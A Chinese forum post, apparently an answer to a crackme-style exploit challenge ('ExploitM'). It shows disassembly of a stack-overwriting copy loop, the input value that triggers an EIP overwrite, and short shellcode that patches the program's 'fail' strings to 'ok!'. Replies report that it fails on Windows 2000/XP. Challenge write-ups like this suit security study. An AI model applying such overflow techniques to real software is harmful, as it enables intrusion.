首页
社区
课程
招聘
[原创]zjjmj2002答案提交!
发表于: 2007-8-28 19:03 5038

[原创]zjjmj2002答案提交!

2007-8-28 19:03
5038
反汇编可以看出,下面这段很关键!
004002D9  |.  6A 1A         PUSH 1A
004002DB  |.  59            POP ECX
004002DC  |.  2BC8          SUB ECX,EAX
004002DE  |.  0FAFC8        IMUL ECX,EAX
004002E1  |.  81E9 9C000000 SUB ECX,9C
004002E7      85C9          TEST ECX,ECX
004002E9      7E 05         JLE SHORT ExploitM.004002F0
004002EB      8D7D D4       LEA EDI,DWORD PTR SS:[EBP-2C]
004002EE      F3:A5         REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> ;这里就是修改堆栈部分!
004002F0      5F            POP EDI
004002F1  |.  33C0          XOR EAX,EAX
004002F3  |.  5E            POP ESI
004002F4  |.  C9            LEAVE
004002F5  \.  C3            RETN
ECX值为0dh就可以修改Eip了。通过算法推出文件第一个双字为65d6h即可使ECX值为0dh

再构造ShellCode
mov eax,0214b4fh ;ok!字符串
mov dword ptr [400268h],eax ;
mov dword ptr [400260h],eax ;替换掉try和fail字符串!
mov ebp,12fb08h ;要恢复ebp值,不然会出错!
jmp XXXXXXX ;跳回原处执行!

收工!

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
2
2K和XP都没通过
2007-8-28 19:07
0
雪    币: 299
活跃值: (25)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
3
我再来试一次!
上传的附件:
2007-8-30 09:14
0
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
4
2K和XP都没通过
2007-8-30 10:54
0
游客
登录 | 注册 方可回帖
返回
//